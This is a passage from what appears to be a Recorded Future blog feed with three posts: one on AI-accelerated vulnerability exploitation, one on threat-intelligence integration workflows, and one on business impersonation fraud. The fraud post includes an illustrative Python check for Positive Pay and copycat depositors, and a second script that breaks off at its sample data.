        <p>This is because attackers do not exploit every bug they find. Instead, they focus on developing exploits for the small subset of vulnerabilities that offer the best combination of reach, reliability, and return on investment, such as flaws that can be exploited remotely or affect widely used software. In other words, a vulnerability still has to be validated, turned into a reliable exploit, matched to a target, and integrated into an attack path worth the effort.</p>
        <p>When a flaw matches the criteria, however, exploitation can <a href="https://www.vulncheck.com/blog/state-of-exploitation-2026">move quickly</a>. VulnCheck found that nearly 29% of KEVs in 2025 were exploited on or before CVE publication, a slight increase from the previous year, indicating the continued prevalence of zero-days and n-days. Much as their legitimate counterparts use AI in software development, adversaries are <a href="https://www.microsoft.com/en-us/security/blog/2026/03/06/ai-as-tradecraft-how-threat-actors-operationalize-ai/">already using</a> AI to accelerate parts of the attack workflow, including vulnerability research, exploit-path analysis, and malware development, even if its precise effect on exploitation timelines is hard to quantify. <a href="https://zerodayclock.com/collapse#the-math">Some trackers</a> estimate the median time-to-exploit may now be measured in hours rather than days, demonstrating the shortening window of time to act on a high-impact vulnerability.</p>
        <h2>How AI Changes the Equation</h2>
        <p>Anthropic and OpenAI recently drew significant attention through their limited release of what they claimed were uniquely powerful cyber defense models. An independent <a href="https://www.aisi.gov.uk/blog/our-evaluation-of-claude-mythos-previews-cyber-capabilities">evaluation</a> of Anthropic’s Mythos found significant improvements in multi-step cyberattack simulations. However, AI-assisted vulnerability discovery and penetration testing predate these models, and most frontier models have <a href="https://c3.unu.edu/blog/large-language-models-in-vulnerability-research-opportunities-and-responsibilities">already demonstrated</a> the ability to identify vulnerabilities and assist with exploit development. At present, these tools are still most effective in the hands of capable operators rather than enabling frictionless, low-skill exploitation at scale. This matters, too, as even if these capabilities are used primarily by security researchers in the near term, the resulting increase in disclosures, proofs of concept, and validated findings still adds to the defensive burden.</p>
        <p>This impacts vulnerability management in three important ways:</p>
        <ul>
          <li><strong>More credible vulnerability reports to triage:</strong> New agentic systems can do more than flag suspicious code; they can reason through program behavior, validate findings, and help identify which weaknesses appear most exploitable.</li>
          <li><strong>Less time to mitigate exploitable vulnerabilities:</strong> Large-language models (LLMs) are accelerating the speed and scale of weaponization, meaning the path from disclosure to exploit could go from hours to minutes.</li>
          <li><strong>Reduced cost of exploit development:</strong> Emerging models appear more capable of producing proof-of-concept exploit code, testing attack paths, and helping skilled operators iterate toward weaponizable exploits faster than before.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_10874cbebef535ea3d33f126ec3451367c311bee9.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="990" />
            </div>
          </div>
          <div>
            <div><strong>Figure 3:</strong> The vulnerability equation: How automated capabilities will likely impact reporting, exploit development, and impact</div>
          </div>
        </div>
        <h3>More Reports, More Noise</h3>
        <p>Using AI agents to analyze software code will almost certainly increase the number of reported vulnerabilities and developed proofs-of-concept. Microsoft’s April 2026 Patch Tuesday, which followed Anthropic’s Project Glasswing announcement, was the company’s second-largest on record. However, according to <a href="https://www.theregister.com/2026/04/14/microsofts_massive_patch_tuesday/">Microsoft</a>, it “does not reflect a significant increase in AI‑driven discoveries, though [they] did credit one vulnerability to an Anthropic researcher using Claude.” The more important question is not whether more flaws will be found — because they will be — but whether defenders can process, validate, and prioritize them fast enough to act.</p>
        <p>Vulnerability submissions are already overwhelming researchers’ ability to <a href="https://www.nist.gov/news-events/news/2026/04/nist-updates-nvd-operations-address-record-cve-growth">assess</a> their overall risk, creating a backlog of vulnerability enrichment and scoring. If AI sharply increases the volume of plausible findings, defenders will face even more uncertainty around which vulnerabilities represent the next high-impact systemic event and which are background noise.</p>
        <h3>Less Time to Act</h3>
        <p>For the vulnerabilities that are actually a problem, defenders have even less time to respond. Automated exploit development will likely shorten the path from discovery to proof of concept and, in some cases, to weaponization for the subset of vulnerabilities worth pursuing. Adding to the triage problem, some medium-severity or otherwise “non-critical” vulnerabilities will need to be re-evaluated as possible components of exploit chains, even if they would not normally rank as urgent on their own.</p>
        <h3>Drowning out the Alarms</h3>
        <p>Even as defenders deal with more noise, a larger volume of reported, plausible findings is likely to increase the absolute number of high-impact exploits they need to address quickly. As a result, defenders face an even greater challenge in identifying the small subset of issues that matter most before attackers do.</p>
        <p>This does not mean every newly disclosed flaw will be weaponized, or that high-impact, “internet-breaking” events will become commonplace; however, even a modest increase in exploited vulnerabilities puts more pressure on prioritization, patching speed, and compensating controls, especially for organizations already struggling with manual triage, slow patch cycles, or legacy software.</p>
        <h2>How to Use Automation for Good</h2>
        <p>For most organizations, the immediate risk is not that every vulnerability will suddenly be exploited, but that defenders will have less time to determine which findings matter most. Vulnerability discovery and exposure management should therefore be treated as related but distinct problems: AI may increase the number of findings, but defenders still need context to determine which exposures are actually reachable, high-impact, and worth urgent remediation.</p>
        <p>In this environment, using AI-enabled vulnerability discovery, prioritization, and defensive remediation will be essential to keeping pace with attackers. The five actions listed in the following section can help organizations stay ahead of the threat.</p>
        <h3>1. Automate Vulnerability Prioritization and Response</h3>
        <p>Shift from CVSS-only scoring to real-time exploitability and exposure-based risk scoring to handle the surge in AI-assisted vulnerability discovery. Deploy automated scanning, validation, and threat hunting to identify exploitation activity quickly, especially in widely used software and internet-facing systems. Recorded Future’s Insikt Group regularly reports on new vulnerabilities and exploit trends and develops Nuclei templates to detect actively exploited vulnerabilities.</p>
        <h3>2. Accelerate Patching and Upgrade Cycles</h3>
        <p>As the time to exploit shifts from days to hours, the time to mitigate vulnerabilities will similarly shorten. Patch management will need to move faster, particularly for internet-facing systems, widely used software components, and critical dependencies. Automated remediation and automated compensating controls will likely become necessary to keep pace with AI-accelerated discovery. The Vulnerability Intelligence module in the Recorded Future Intelligence Operations Platform can help with prioritization based on the likelihood of exploitation. Ensure all automated actions are logged and regularly audited by a human, and require a human-in-the-loop for any actions on high-impact systems.</p>
        <h3>3. Reduce Dependence on Legacy and Unsupported Software</h3>
        <p>AI may make it easier for threat actors to identify and validate exploitable weaknesses in older, under-maintained codebases. Unsupported systems and aging software are likely to become increasingly difficult to justify unless they are strongly isolated and tightly controlled.</p>
        <h3>4. Shift Vulnerability Detection Earlier in the Software Lifecycle</h3>
        <p>Organizations should integrate automated security testing and AI-assisted vulnerability discovery into development pipelines. Early detection can help defenders fix vulnerabilities before production, reducing remediation burden later.</p>
        <h3>5. Get Ready for the Next High-Impact Event</h3>
        <p>Develop emergency response and mitigation playbooks specifically for high-impact, broadly applicable flaws, including scenarios where a patch is not immediately available. Preparation should include not just patching, but also containment measures such as segmentation, access restrictions, traffic filtering, and other compensating controls.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_11168f446613f5d773eced354e3680b7c6f41322f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[4 Essential Integration Workflows for Operationalizing Threat Intelligence Recorded Future]]></title>
            <link>https://www.recordedfuture.com/blog/4-essential-integration-workflows-for-operationalizing-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/4-essential-integration-workflows-for-operationalizing-threat-intelligence</guid>
            <pubDate>Fri, 17 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how to integrate threat intelligence into your existing security stack with Recorded Future. Explore four stages of cyber maturity, four key integration workflows, and practical steps to move your program from reactive to autonomous.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li><strong>Integrate, don't replace.</strong> Recorded Future enriches your existing security tools by automatically layering in contextual threat intelligence, reducing manual effort and enabling faster, better-informed decisions.</li>
                <li><strong>Know where you stand.</strong> Assessing your organization's maturity across four stages — reactive, proactive, predictive, and autonomous — helps you identify which workflows to prioritize and where automation can have the most impact.</li>
                <li><strong>Start simple, then scale.</strong> Four core workflows (i.e., IOC enrichment, vulnerability prioritization, Autonomous Threat Operations, and watch list automation) offer a practical on-ramp, and many integrations can be activated in just a few clicks through Recorded Future's Integration Center.</li>
              </ul>
            </div>
          </div>
        </div>
        <p>Threat intelligence can elevate cybersecurity programs from reactive to autonomous, transforming workflows and delivering measurable improvements. <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/3ff3403d-e307-4800-a4f1-f2cde1d83236">In a recent webinar</a>, we shared practical steps for integrating threat intelligence into existing security stacks, optimizing workflows, and accelerating organizational maturity in cybersecurity practices.</p>
        <p>Read on for actionable insights, frameworks, and tools shared during the session.</p>
        <p><strong>Bridging the gap: threat intelligence integration</strong></p>
        <p>The key to effective threat intelligence is making your tools work together seamlessly. Recorded Future doesn’t aim to replace your existing cybersecurity tools, but rather to <a href="https://www.recordedfuture.com/platform/integrations">enrich and connect them.</a></p>
        <p>When Recorded Future connects to the tools already in your stack, it automatically adds contextually relevant threat intelligence to whatever you're working on. This can mean less manual effort and faster, better-informed decisions.</p>
        <h2><strong>Understanding your organization’s cyber maturity</strong></h2>
        <p>A useful starting point is assessing where your organization currently stands across four stages of cybersecurity maturity: reactive, proactive, predictive, and autonomous:</p>
        <ol>
          <li><strong>Reactive</strong> organizations focus on responding to incidents as they occur.</li>
          <li><strong>Proactive</strong> organizations hunt for threats before they lead to incidents and align detection systems to adapt toward emerging risks.</li>
          <li><strong>Predictive</strong> programs extend threat intelligence beyond the security operations center (SOC) to other organizational stakeholders.</li>
          <li><strong>Autonomous</strong> programs leverage automation to identify and respond to threats in real time at machine speed.</li>
        </ol>
        <p><a href="https://www.recordedfuture.com/resources/maturity-assessment">Maturity</a> doesn't have to be assessed at the program level alone. Individual use cases may be at different stages. Alert management, for instance, may already be highly automated, while other workflows remain more reactive.</p>
        <p>A helpful way to identify where to focus is to ask a series of questions, including:</p>
        <ul>
          <li>What does my current alert workflow look like?</li>
          <li>What's my most time-consuming process?</li>
          <li>What's my top priority for the next 12 months?</li>
        </ul>
        <p>Your answers will enable you to identify areas for improvement and then prioritize your workflows as needed.</p>
        <h2><strong>Three key integration workflows—and one bonus workflow</strong></h2>
        <p>Next, we suggest integration workflows that are designed to help you optimize your security operations with Recorded Future threat intelligence:</p>
        <h3><strong>1. Indicator of compromise (IOC) enrichment</strong></h3>
        <p>Detection tools often generate alerts with limited context, leaving you asking why something was flagged and how risky it actually is. By integrating Recorded Future, you’ll find that those alerts can be automatically enriched with information such as malware families, exploited vulnerabilities, and threat actor connections—enabling better, faster decisions without additional manual research.</p>
        <h3><strong>2. Vulnerability prioritization</strong></h3>
        <p>Most organizations depend on CVSS scores or vendor-provided data to assess vulnerabilities, but that approach doesn't always reflect real-world risk. A more effective strategy is asking: Is this vulnerability being actively exploited in targeted campaigns? Are threat actors targeting my industry with it?</p>
        <p>Recorded Future enhances vulnerability management primarily through threat intelligence context, with risk scoring that tells you why something is risky—specifically whether a CVE is being actively exploited in the wild, and whether it's targeting organizations in your industry.</p>
        <h3><strong>3. Autonomous Threat Operations</strong></h3>
        <p>The most advanced workflow involves automating threat detection and prevention from end to end. Recorded Future can identify emerging threats, initiate retroactive threat hunts, and automatically update detection and blocking lists in tools like EDR platforms—all without manual intervention. This will enable your security team to shift from reactive firefighting to real-time, autonomous threat prevention. <a href="https://www.recordedfuture.com/products/autonomous-threat-operations">Learn more about Autonomous Threat Operations</a>, available in Recorded Future’s Professional and Elite pricing packages.</p>
        <h3><strong>4. Bonus workflow: Watch list automation</strong></h3>
        <p>Your existing vulnerability scanners like Tenable, Qualys, Wiz, and Rapid7 are already identifying vulnerabilities in your environment. A Watch List automation connector can link those tools directly into Recorded Future's Watch Lists, so the Platform automatically reflects your real threat footprint at all times. Instead of tracking a static list of top vulnerabilities, you get contextual intelligence tied to what's actually in your environment, and you're automatically alerted when vulnerabilities change in risk status. This shifts vulnerability management from a reactive posture to a predictive one, and makes prioritization effectively autonomous.</p>
        <h2><strong>The role of Recorded Future’s Integration Center</strong></h2>
        <p>The <a href="https://www.recordedfuture.com/integrations">Integration Center</a> makes it straightforward to connect with popular security tools including Splunk, ServiceNow, CrowdStrike, and SentinelOne. Many of these integrations are pre-built and can be activated in just a few clicks, meaning there may already be value waiting to be unlocked within your existing SIEM, SOAR, EDR, TIP, vulnerability management tools, GRC platforms, and more.</p>
        <h2><strong>Driving business value with integrated threat intelligence</strong></h2>
        <p>Beyond operational efficiency, well-integrated threat intelligence workflows build organizational trust and give security leaders a stronger, data-backed narrative about how their teams are operating. Automating enrichment and response creates the space to focus on strategic priorities—and makes it easier to demonstrate the program's value to leadership.</p>
        <p>The path toward autonomous threat operations requires sophisticated technology, seamless integrations, smart prioritization, and strategic planning. The best approach is simply to start: Activate a workflow, see the value it delivers, and build from there.</p>
        <p>If you need help getting started or have questions about your organization’s specific needs, <a href="https://www.recordedfuture.com/get-started#book-demo">book a custom demo</a>.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_12d6bc15802a3569cc98a12874c0790ad0d3cfa5f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[From Bazooka to Fake Nikes]]></title>
            <link>https://www.recordedfuture.com/blog/from-bazooka-to-fake-nikes</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/from-bazooka-to-fake-nikes</guid>
            <pubDate>Thu, 16 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A deep dive into business impersonation fraud — from fake companies cashing stolen checks to AI-powered shopping scams — and why the same vulnerability enables both.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>Business impersonation is the hidden thread connecting old and new fraud. Discover how the same core tactic is fueling both a surge in commercial check fraud and an explosion of AI-powered online shopping scams targeting younger consumers.</li>
                <li>Tools like Positive Pay and 3D Secure authentication, while effective against the fraud they were built to stop, have pushed threat actors to evolve their schemes in ways that render those controls irrelevant.</li>
                <li>Ecosystem gaps are often the real vulnerability. Fraudsters exploit the chain of assumed trust between social media platforms, card networks, merchant onboarders, banks, and local business registries — turning each party's reliance on the last into an open door.</li>
              </ul>
            </div>
          </div>
        </div>
        <p>If you’re a millennial or Gen Z-er, then you probably haven’t used a paper check in a while. According to the <a href="https://www.atlantafed.org/research-and-data/surveys/survey-and-diary-of-consumer-payment-choice?utm_source=substack&amp;utm_medium=email#panel=2">Federal Reserve Bank of Atlanta</a>, just 1 out of 5 of your peers used a check in the last 30 days, versus 2 out of 5 Gen Xers and 3 out of 5 boomers. Yet despite year-on-year decreases in overall usage, <a href="https://verafin.com/2025/12/nasdaq-verafin-catches-over-1-billion-in-check-fraud-in-2025/?utm_source=substack&amp;utm_medium=email">Nasdaq Verafin</a> saw check fraud instances rise another 11% in 2025.</p>
        <p>Then again, if you are a millennial or Gen Z-er, you will have seen an advertisement for a cheap product on social media. For <a href="https://www.pewresearch.org/short-reads/2025/11/19/about-a-third-of-americans-say-theyve-had-an-online-shopping-scam-happen-to-them/?utm_source=substack&amp;utm_medium=email">40% of you</a>, that has meant falling for an online shopping scam.</p>
        <p>On the face of it, these look like two ends of the fraud spectrum:</p>
        <ul>
          <li>On the one hand, we have what feels like the past: paper check usage rates even among those aged 65+ fell from 13% of transactions in 2013 to 6% in 2025 (<a href="https://www.atlantafed.org/research-and-data/publications/take-on-payments/2025/07/07/innovations-in-payments-acceptance-play-out-in-consumer-check-use?utm_source=substack&amp;utm_medium=email">Federal Reserve Bank of Atlanta</a>).</li>
          <li>On the other hand, we have the future: online shopping scams target a younger demographic through AI-enabled brand impersonation and sprawling social media ad ecosystems.</li>
        </ul>
        <p>The payment instruments, demographics, and the teams working at financial institutions to address these problems differ. So what’s the thread linking them together? Business impersonation. It manifests itself differently across schemes, but for anti-fraud systems built to detect check washing and counterfeiting on the one hand, and unauthorized third-party card fraud on the other, business impersonation has emerged as the fraudster’s response to exploit both.</p>
        <h2>Commercial checks and copycat businesses across state lines</h2>
        <p>In the past, stolen checks were often washed to change the recipient and amount, and then walked into banks for cashout. The Postal Inspection Service received over 299,000 mail theft complaints in a single 12-month period—a 161% increase from the prior year. Recorded Future’s Fraud Intelligence Team analyzed and mapped stolen checks to US geographies, illustrating hot spots of physical crime and observing that it remains a national issue that extends beyond heavily urbanized areas.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ae67a7886291f3ca973623a136518e5754335b02.png?width=750&amp;format=png&amp;optimize=medium" width="1381" height="751" />
            </div>
          </div>
          <div>
            <div><em>Mapping stolen checks by zip code; courtesy of Recorded Future</em></div>
          </div>
        </div>
        <p>Yet even among declining consumer check usage rates, businesses’ use of commercial checks remains stubbornly high in the US: the <a href="https://www.financialprofessionals.org/training-resources/resources/survey-research-economic-data/Details/payments-fraud?__hstc=110159258.08b65636f3e81487b21bd53bc12a6e37.1770568886227.1770668440686.1770742788656.3&amp;__hssc=110159258.1.1770742788656&amp;__hsfp=4888b6684dc00907b9aeb05be67a9fa9&amp;utm_source=substack&amp;utm_medium=email">Association for Financial Professionals</a> (AFP) found that 91% of organizations are still using checks, and 63% experienced check fraud in 2024. When businesses send checks to suppliers, the amounts can rise quickly, leading fraudsters to expand beyond simple check-washing schemes.</p>
        <p>In perhaps the most eye-catching example, fraudsters <a href="https://manhattanda.org/d-a-bragg-check-fraud-ring-indicted-for-stealing-1-2m-from-bazooka-companies-maker-of-classic-bubble-gum/?utm_source=substack&amp;utm_medium=email">intercepted</a> a commercial check destined for bubble-gum giant Bazooka in 2022. A $1.24 million check. Over the next two weeks, they transferred and withdrew over half a million dollars. How’d they do it? You can’t just wash out the payee name on a million-dollar check, replace it with John Smith, and expect it to clear after depositing it into a personal checking account.</p>
        <p>Instead, the threat actors just created a fake Bazooka. The real Bazooka is registered in Delaware under the name “The Bazooka Companies, LLC”, so culprits registered a fictitious company in New York under the name “The Bazooka Companies 1 Inc”. They then used the official business license to open a corporate bank account for the new fictitious business. From there, they used cashier checks, withdrawals, and transfers to personal accounts to cash out the funds.</p>
        <p>Fast forward to today, and the scheme is still happening. Recent research from <strong><a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Recorded Future Payment Fraud Intelligence</a></strong> <strong>(PFI)</strong> surveyed stolen checks for sale on Telegram in Q4 2025 and found over 30 checks with a business as the payee, along with suspicious new entities registered in other states a few days later. The total face value of the checks amounted to $2M.</p>
        <p>As with most fraud, this scheme’s emergence is based on:</p>
        <ul>
          <li><strong>Exploiting ecosystem gaps between disparate parties:</strong> Businesses can have the same name as another when registered in different states. Pair that with most states’ limited mandate to investigate business registrations, and we’re left with the first gap:</li>
        </ul>
        <p><em>“As long as the basic filing requirements are met, the office[s] may have little or no authority to question or reject a document submitted for filing or to verify information included in the filing”</em> (<a href="https://www.nass.org/sites/default/files/reports/final-nass-report-business-filing-fraud-091925.pdf?utm_source=substack&amp;utm_medium=email">National Association of Secretaries of State</a>, September 2025)</p>
        <p>When a fraudster approaches a bank to open a business bank account, the bank conducts its own due diligence. But the focus here is on money laundering threats and the legitimacy of documents and applicants. If the fraudsters are using a clean identity — synthetic or otherwise — then the bank won’t have a clear reason to reject the application just because a business called John’s Toilet Supply, LLC exists in another state.</p>
        <ul>
          <li><strong>Delivering a reactionary counterpunch to effective fraud processes:</strong> Think of this as the cat-and-mouse game. Fraud defenders figure out how to stop one scheme, forcing fraudsters to innovate. In this case, Positive Pay has proven remarkably effective at preventing check washing and counterfeit checks (when parties agree to use it). Payee Positive Pay, in particular, allows the payer to make sure that when their checks are deposited, the check number, date, payee name, and amount match their files. But what happens if everything is correct, but a copycat payee deposits the check? Cases like Bazooka.</li>
        </ul>
        <h2>80% discount on shoes? How can you say no?</h2>
        <p>If we detour into e-commerce, we see a very similar dynamic play out, but at a staggeringly larger scale. The premise is simple: use AI to launch a fake online shop impersonating company A, B, or C, buy ad space on social media to drive traffic, pocket the proceeds, and launder the funds while customers wait for goods that never arrive.</p>
        <p>The scheme works because 53% of consumers, and 76% of Gen Zers, now begin shopping journeys on social media, according to <a href="https://www.salesforce.com/news/stories/social-shopping-stats-2025/?utm_source=substack&amp;utm_medium=email">Salesforce’s 2025 report</a>. The problem is that the journey is littered with traps: in November 2025, <a href="https://www.reuters.com/investigations/meta-is-earning-fortune-deluge-fraudulent-ads-documents-show-2025-11-06/?utm_source=substack&amp;utm_medium=email">leaked internal documents</a> from Meta claimed the “company shows its platforms’ users an estimated 15 billion ‘higher risk’ scam advertisements — those that show clear signs of being fraudulent — every day”. Industry reporting paints the same picture, with the Better Business Bureau finding online shopping scams to be the most reported scam type and social media advertisements the most common originator.</p>
        <div>
          <div>
            <div>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ccaa97f85eebb173855f1669c1422aee9e49f717.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1600" height="1200" />
              </p>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_11e27062f373f6e184680c4d10916a2b03c3da510.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1600" height="1153" />
              </p>
            </div>
          </div>
          <div>
            <div><em>Brand impersonation shopping scams impacting shoppers in January 2026; courtesy of Recorded Future</em></div>
          </div>
        </div>
        <p>The basics of the scheme are nothing new: capture payment card data by creating a fake online store and advertising too-good-to-be-true discounts. What’s changed is that these are no longer just phishing websites. They’re functional online shops that process payments via merchant accounts, and behind each of these merchant accounts is a registered business.</p>
        <p>This is creating problems throughout the ecosystem:</p>
        <ul>
          <li>Cardholders see websites that exactly mimic major (and increasingly niche) brands, letting discounts outweigh better judgment.</li>
          <li>Financial institutions face the challenge of balancing their duty of care to process customer transactions with the risks of fraud and money laundering. But in these cases, the traditional indicators of cyber-enabled fraud aren’t present. The cardholder is authorizing the transaction, and there’s nothing suspicious within the behavioral or device indicators of the 3D Secure authentication stream. (Because, again, it’s the cardholder doing the transacting under manipulation.)</li>
          <li>The fingers begin to point back at the acquirers and payment facilitators responsible for merchant onboarding, but, from their perspective, the entity holds a proper commercial license to engage in business issued by the local authorities. (Though, as a divergence from the check fraud scheme, the fraudsters in online shopping scams rarely impersonate a real big-name brand at the business creation and merchant onboarding stage. Instead, the fraudsters hide evidence of impersonation from the merchant onboarders and leave the impersonation for the ads and fake online shops visible to victims.)</li>
        </ul>
        <p>But just like with the check fraud example, a big part of why online shopping scams have exploded — outside of generative AI making brand abuse content easier than ever to create at scale — is ecosystem gaps and fraudsters reacting to the defense:</p>
        <ul>
          <li><strong>Exploiting ecosystem gaps between disparate parties:</strong> By the time a victim is making a purchase on an online shopping scam website, each entity along the way has looked to the one before and trusted that due diligence had been performed. The cardholder wants to trust that the social media platform screened out malicious advertisers; the card issuer wants to trust the cardholder vetted the merchant; the card network wants to trust the merchant onboarder verified the business; and the merchant onboarder wants to trust local authorities properly licensed the business. A big, long line of incentivized trust.</li>
          <li><strong>Delivering a reactionary counterpunch to effective fraud processes:</strong> The industry has made huge strides in combating unauthorized, third-party card-not-present (CNP) fraud in the last decade. A major part of the success has been built on 3D Secure, introducing a layer of authentication on top of existing authorization controls. Online shopping scams completely sidestep the defensive layer by making the merchant the fraud surface and rendering cardholder authentication controls irrelevant.</li>
        </ul>
        <h2>Thinking towards the way out</h2>
        <p>On the check fraud side, the best solution may already be available, but, as with most solutions, it comes with trade-offs and adoption issues. The basic idea of Positive Pay and its derivative, Payee Positive Pay, is that a business informs its bank of the checks it is sending, and the bank only disburses funds if the check matches what the business provided. Positive Pay was designed to combat counterfeit and forged checks, and it does that very well.</p>
        <p>Of course, in the Bazooka example of same-name business impersonation, Positive Pay wouldn’t help: nothing about the check was modified. For that case, banks offer Reverse Positive Pay, in which the bank reports each check presented against the account and the business approves or rejects it before funds are released. It can solve the problem, but it shifts more operational and investigatory expense onto the business (which might explain why <a href="https://www.alkami.com/resources/research/reports/positive-pay-adoption-trends-strategies-for-banks-credit-unions?utm_source=substack&amp;utm_medium=email">adoption rates</a> are south of 20%, according to Datos Insights and Alkami). In the end, though, it makes you wonder why not heed the advice and move to alternative electronic payment methods?</p>
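        <p>To make the gap concrete, here is an added example (written for this edit, not code from the post or from any bank’s Positive Pay system) of the Payee Positive Pay match described above, followed by the depositor check that Positive Pay does not perform. The issued-check file, vendor master and presented checks are constructed to mirror the same-name-entity scheme; the field names, the depositor-of-record fields and the <code>REVIEW</code> outcome are assumptions of this example.</p>

```python
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class IssuedCheck:
    """One row of the issued-check file a payer sends its bank under Positive Pay."""
    number: str
    issue_date: date
    payee: str
    amount_cents: int


@dataclass(frozen=True)
class PresentedCheck:
    """A check arriving for payment, plus what the bank of first deposit knows about the depositor.
    (Depositor fields are an assumption of this example; Positive Pay itself never sees them.)"""
    number: str
    issue_date: date
    payee: str
    amount_cents: int
    depositor_entity: str  # legal name on the account the check was deposited into
    depositor_state: str   # state where that entity is registered


def normalize_name(name: str) -> str:
    """Case- and punctuation-insensitive comparison of business names."""
    cleaned = name.upper().replace(",", " ").replace(".", " ")
    return " ".join(cleaned.split())


def payee_positive_pay(issued: dict, check: PresentedCheck) -> tuple:
    """Payee Positive Pay: pay only if number, date, payee and amount match the issued file."""
    expected = issued.get(check.number)
    if expected is None:
        return "EXCEPTION", "check number not in issued file (counterfeit?)"
    if expected.amount_cents != check.amount_cents:
        return "EXCEPTION", "amount differs from issued file (alteration?)"
    if expected.issue_date != check.issue_date:
        return "EXCEPTION", "date differs from issued file"
    if normalize_name(expected.payee) != normalize_name(check.payee):
        return "EXCEPTION", "payee differs from issued file (washing?)"
    return "PAY", "all fields match the issued file"


def depositor_review(vendor_master: dict, check: PresentedCheck) -> tuple:
    """The check Positive Pay does not make: is the depositing entity the payer's actual vendor?

    vendor_master maps a normalized payee name to the payer's own record of that vendor
    (hypothetical structure). A same-name entity registered in another state is flagged.
    """
    vendor = vendor_master.get(normalize_name(check.payee))
    if vendor is None:
        return "REVIEW", "payee not found in vendor master"
    same_name = normalize_name(vendor["legal_name"]) == normalize_name(check.depositor_entity)
    same_state = vendor["state"] == check.depositor_state
    if same_name and same_state:
        return "PAY", "depositor matches vendor record"
    return "REVIEW", (f"depositor {check.depositor_entity!r} ({check.depositor_state}) does not match "
                      f"vendor record {vendor['legal_name']!r} ({vendor['state']})")


# Constructed sample data mirroring the same-name-entity scheme described in the post.
ISSUED = {
    "1042": IssuedCheck("1042", date(2022, 3, 1), "The Bazooka Companies, LLC", 124_000_000),
}
VENDOR_MASTER = {
    normalize_name("The Bazooka Companies, LLC"): {"legal_name": "The Bazooka Companies, LLC", "state": "DE"},
}
COUNTERFEIT = PresentedCheck("9999", date(2022, 3, 1), "The Bazooka Companies, LLC", 124_000_000,
                             "The Bazooka Companies, LLC", "DE")
WASHED = PresentedCheck("1042", date(2022, 3, 1), "John Smith", 124_000_000, "John Smith", "NY")
COPYCAT = PresentedCheck("1042", date(2022, 3, 1), "The Bazooka Companies, LLC", 124_000_000,
                         "The Bazooka Companies 1 Inc", "NY")
GENUINE = PresentedCheck("1042", date(2022, 3, 1), "The Bazooka Companies, LLC", 124_000_000,
                         "The Bazooka Companies, LLC", "DE")


def decide(check: PresentedCheck) -> str:
    """Combine the two controls: Positive Pay first, then the depositor review on anything it would pay."""
    verdict, _ = payee_positive_pay(ISSUED, check)
    if verdict != "PAY":
        return verdict
    verdict, _ = depositor_review(VENDOR_MASTER, check)
    return verdict


if __name__ == "__main__":
    for label, chk in [("counterfeit", COUNTERFEIT), ("washed", WASHED), ("copycat", COPYCAT), ("genuine", GENUINE)]:
        print(f"{label:11s} positive_pay={payee_positive_pay(ISSUED, chk)[0]:9s} final={decide(chk)}")
```

        <p>Run it and the counterfeit and washed checks stop at the Positive Pay stage, while the copycat deposit passes every Positive Pay field and is only caught by comparing the depositing entity and state against the payer’s own vendor record. That comparison is the extra work Reverse Positive Pay effectively hands back to the business, which is where the operational cost comes from.</p>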
        <p>On the online shopping scam side, solutions are more complex and scattered across the ecosystem.</p>
        <ul>
          <li>At the top of the funnel, there’s rising pressure on online advertising platforms to do a better job at limiting the presence of fraudulent advertisements. Based on more leaked internal Meta documents, regulatory pressure may not be producing the desired outcome.</li>
          <li>At the merchant onboarding level, both the major card networks are forcing acquirers and payment facilitators to do more to defend the gates into payment processing, while also devoting more resources to identifying scam merchants that do make it in.</li>
        </ul>
        <p>For card issuers on the frontline, it’s a more delicate dance. Card issuers aren’t on the hook for authorized card payments to fraudsters under the Fair Credit Billing Act (FCBA) or Electronic Funds Transfer Act (EFTA), but <a href="https://www.alloy.com/reports/2025-scams-report?utm_source=substack&amp;utm_medium=email">67% of cardholders</a> expect them to cover scam losses. Though when cards transacting on scam websites end up on the dark web for resale, and unauthorized charges start rolling in, it is the issuer’s problem.</p>
        <p>The best solution aligns with the industry’s movement toward <a href="https://intelligence2risk.substack.com/p/the-need-for-cyber-fraud-fusion-centers?utm_source=substack&amp;utm_medium=email">CTI-fraud fusion models</a> to address the cyber component of cyber-enabled fraud. The convergence of online shopping and purchase scams is precisely the type of problem the new organizational model was meant to combat.</p>
        <p>In applying the CTI-fraud fusion model to purchase scams, traditional fraud assets start at the end of the fraud attack chain to correlate reported cardholder manipulation and non-delivery alerts against merchant account patterns. The CTI assets start at the beginning, sourcing online shopping scams at runtime and attributing the abused merchant accounts. The two teams then meet in the middle, using modeled transaction patterns and threat-hunted active scam websites, ultimately leading to the deployment of merchant-based fraud risk rules.</p>
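        <p>As an added illustration of that meet-in-the-middle workflow (example code written for this edit, not Recorded Future’s rule engine or any issuer’s), the script below takes constructed authorizations, cardholder non-delivery reports and a CTI list of hunted scam sites attributed to merchant accounts, and derives a per-merchant action. The merchant IDs, descriptors, card tokens, domains and thresholds are all invented.</p>

```python
from collections import defaultdict

# Constructed sample data: merchants, cards and domains are invented for illustration.
AUTHS = [  # (merchant_id, statement_descriptor, card_token, amount_usd)
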